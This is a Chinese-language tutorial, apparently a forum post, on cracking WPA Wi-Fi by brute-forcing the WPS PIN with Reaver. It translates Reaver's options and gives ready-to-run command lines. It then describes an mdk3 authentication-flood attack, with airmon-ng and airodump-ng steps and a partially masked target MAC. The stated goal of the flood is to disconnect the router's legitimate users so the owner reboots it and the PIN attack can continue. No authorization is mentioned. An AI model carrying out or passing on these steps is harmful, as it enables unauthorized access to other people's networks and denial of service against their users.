破解WPA時，PIN出現(xiàn)死循環(huán)處理方法。如下面這個例子，一開始，或者破解一段時間后出來PIN無限循環(huán)：本人經(jīng)過多次實驗最后總結了解決的辦法：

RequiredArguments:

-i,--interface=<wlan>Nameofthemonitor-modeinterfacetouse

網(wǎng)卡的監(jiān)視接口，通常是mon0

-b,--bssid=<mac>BSSIDofthetargetAP

AP的MAC地址

OptionalArguments:

-m,--mac=<mac>MACofthehostsystem

指定本機MAC地址，在AP有MAC過濾的時候需要使用

-e,--essid=<ssid>ESSIDofthetargetAP

路由器的ESSID，一般不用指定

-c,--channel=<channel>Setthe802.11channelfortheinterface(implies-f)

信號的頻道，如果不指定會自動掃描

-o,--out-file=<file>Sendoutputtoalogfile[stdout]

標準輸出到文件

-s,--session=<file>Restoreaprevioussessionfile

恢復進程文件

-C,--exec=<command>Executethesuppliedcommanduponsuccessfulpinrecovery

pin成功后執(zhí)行命令

-D,--daemonizeDaemonizereaver

設置reaver成Daemon

-a,--autoAutodetectthebestadvancedoptionsforthetargetAP

對目標AP自動檢測高級參數(shù)

-f,--fixedDisablechannelhopping

禁止頻道跳轉

-5,--5ghzUse5GHz802.11channels

使用5G頻道

-v,--verboseDisplaynon-criticalwarnings(-vvformore)

顯示不重要警告信息-vv可以顯示更多

-q,--quietOnlydisplaycriticalmessages

只顯示關鍵信息

-h,--helpShowhelp

顯示幫助

AdvancedOptions:

-p,--pin=<wpspin>Usethespecified4or8digitWPSpin

直接讀取psk（本人測試未成功，建議用網(wǎng)卡自帶軟件獲?。?/p>

-d,--delay=<seconds>Setthedelaybetweenpinattempts[1]

pin間延時，默認1秒，推薦設0

-l,--lock-delay=<seconds>SetthetimetowaitiftheAPlocksWPSpinattempts[60]

AP鎖定WPS后等待時間

-g,--max-attempts=<num>Quitafternumpinattempts

最大pin次數(shù)

-x,--fail-wait=<seconds>Setthetimetosleepafter10unexpectedfailures[0]

10次意外失敗后等待時間，默認0秒

-r,--recurring-delay=<x:y>Sleepforysecondseveryxpinattempts

每x次pin后等待y秒

-t,--timeout=<seconds>Setthereceivetimeoutperiod[5]

收包超時，默認5秒

-T,--m57-timeout=<seconds>SettheM5/M7timeoutperiod[0.20]

M5/M7超時，默認0.2秒

-A,--no-associateDonotassociatewiththeAP(associationmustbedonebyanotherapplication)

不連入AP（連入過程必須有其他程序完成）

-N,--no-nacksDonotsendNACKmessageswhenoutoforderpacketsarereceived

不發(fā)送NACK信息（如果一直pin不動，可以嘗試這個參數(shù)）

-S,--dh-smallUsesmallDHkeystoimprovecrackspeed

使用小DH關鍵值提高速度（推薦使用）

-L,--ignore-locksIgnorelockedstatereportedbythetargetAP

忽略目標AP報告的鎖定狀態(tài)

-E,--eap-terminateTerminateeachWPSsessionwithanEAPFAILpacket

每當收到EAP失敗包就終止WPS進程

-n,--nackTargetAPalwayssendsaNACK[Auto]

對目標AP總是發(fā)送NACK，默認自動

-w,--win7MimicaWindows7registrar[False]

模擬win7注冊，默認關閉

------個人心得---------------------------------------------------------

對一個ap剛開始pin的時候打開-vv參數(shù)，如果順利，就中斷，然后改成-v繼續(xù)pin，反正進度是可以保存的

reaver-imon0-bxx:xx:xx:xx:xx:xx-d0-vv-a-S

如果一直pin不動，嘗試加-N參數(shù)

reaver-imon0-bxx:xx:xx:xx:xx:xx-d0-vv-a-S–N

AP洪水攻擊1、打氣筒mdk3攻擊模式操作方法首先檢測網(wǎng)卡：

ifconfig-a

然后模擬端口：

airmon-ngstartwlan0

接下來用：

airodump-ngmon0

掃描ap找到你pin死的路由器mac

用mdk3做身份驗證攻擊

mdk3mon0a-amac（被pin死的路由器的mac）

身份驗證攻擊效果說明：

此攻擊是針對無線AP的洪水攻擊，又叫做身份驗證攻擊。其原理就是向AP發(fā)動大量的虛假的鏈接請求，這種請求數(shù)量一旦超過了無線AP所能承受的范圍，AP就會自動斷開現(xiàn)有鏈接，使合法用戶無法使用無線網(wǎng)絡。迫使路由主人重啟路由器。

說明：

此命令功能強大，使用錯誤會造成所有ap不能使用，請指定mac地址，然后使用，其余命令不要亂試。你要使用此命令的其他參數(shù)，請詳細閱讀此命令參數(shù)詳解2、CDlinuxmdk3攻擊模式操作方法首先進入CDlinux，打開水滴或者打氣筒搜索pin死的MAC地址（直接打開螃蟹或者3070驅動搜索無線MAC地址也OK）。

\o"未命名.jpg下載次數(shù):1"然后點擊左下角CDlnux圖標，依次打開無線安全--------mdk3-v6

\o"1.jpg下載次數(shù):1"

進入mdk3后輸入命令mdk3mon0a-a40:16:9F:**:2C:B2(40:16:9F:**:2C:B2為你pin死的路由的MAC，注意空格和大小寫）

\o"2.jpg下載次數(shù):0"回車后進入攻擊模式，時間不要太長，最多半分鐘就可以關閉對話框然后重新掃描網(wǎng)絡看pin死的路由是不是已經(jīng)不在了。等待主人重啟吧~~~

非CDLinux可以在這里啟動命令輸入框注意：1、只有客戶端在線時進行攻擊才可能達到迫使重啟目的，信號越強，效果越佳。2、每次攻擊最好不超5min，否則卡死（看機器配置），稍停1min在進行攻擊，連續(xù)攻擊三次應該就可以了！

8C210Apin重碼或者pin死路由器的解決辦法（我驗證貌似有效）看看我重碼拼死后,的時候

\o"002.png下載次數(shù):0"拼死路由器后,整整一晚上沒有在找到這個信號,今天起床在看,發(fā)現(xiàn)又出來了,繼續(xù)拼,發(fā)現(xiàn),重碼非常非常的嚴重,今天中午放棄N次,今晚在小試一下,加了參數(shù)后,大減少重碼,堅持就是勝利,往下看。

\o"01.PNG下載次數(shù):0"\o"02.PNG下載次數(shù):0"看到了吧,重碼,不過,是偶偶的了,加了參數(shù)后,不會像昨天和今天上午那樣,一直重碼一個碼不動了.在往下看,奇跡出現(xiàn)了。\o"03.PNG下載次數(shù):0"Pin碼重復出現(xiàn)死循環(huán)解決辦法xiao